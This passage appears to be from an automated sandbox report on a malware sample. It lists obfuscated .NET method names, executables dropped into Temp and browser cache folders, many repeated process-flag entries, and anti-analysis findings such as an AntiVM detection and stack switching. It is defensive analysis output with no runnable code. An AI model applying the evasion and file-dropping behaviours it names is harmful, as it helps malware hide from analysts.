              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.csHigh entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, XlB6SnfKxWLPwwKgeG.csHigh entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, OrWCX5jtbYmS0dA9kT.csHigh entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, EcZcId4bZdkXGBs06MG.csHigh entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, TBtgc3RMhuEWiOKVR4.csHigh entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, CewcDn534jkjemavqx.csHigh entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, G48YiXYv5ISrKQh5V0.csHigh entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, TFHvvsv69ePy2X2akQ.csHigh entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, UDhf94o4ucAkwsm0sp.csHigh entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, A297vOAUIe0qEnXTYd.csHigh entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, EN7XnI15c37fuU7Hp5.csHigh entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, qLqlDin0qbgjcnfC3W.csHigh entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, xKGw5U4U0dqk7yQy8K9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, Wn4fI4CGsHeONDg1CJ.csHigh entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, n0j6khafNtyqP9fmV3.csHigh entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, oM1ONZzUFLWJVwrBmD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, gdM9Sh7KfRnAMumxqn.csHigh entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, jQDDruxhUW3L8ewCVZ.csHigh entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, lhJ65bFXQHOYZTcgeP.csHigh entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, G2EwvXm0pgP65nBy4N.csHigh entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.csHigh entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, XlB6SnfKxWLPwwKgeG.csHigh entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, OrWCX5jtbYmS0dA9kT.csHigh entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, EcZcId4bZdkXGBs06MG.csHigh entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, TBtgc3RMhuEWiOKVR4.csHigh entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, CewcDn534jkjemavqx.csHigh entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, G48YiXYv5ISrKQh5V0.csHigh entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, TFHvvsv69ePy2X2akQ.csHigh entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, UDhf94o4ucAkwsm0sp.csHigh entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, A297vOAUIe0qEnXTYd.csHigh entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, EN7XnI15c37fuU7Hp5.csHigh entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, qLqlDin0qbgjcnfC3W.csHigh entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, xKGw5U4U0dqk7yQy8K9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, Wn4fI4CGsHeONDg1CJ.csHigh entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, n0j6khafNtyqP9fmV3.csHigh entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'
              Source: C:\Windows\SysWOW64\chkntfs.exeFile created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeJump to dropped file
              Source: C:\Windows\SysWOW64\chkntfs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exeJump to dropped file
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: aj34fjqh.exe PID: 6180, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
              Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: 7380000 memory reserve | memory write watchJump to behavior
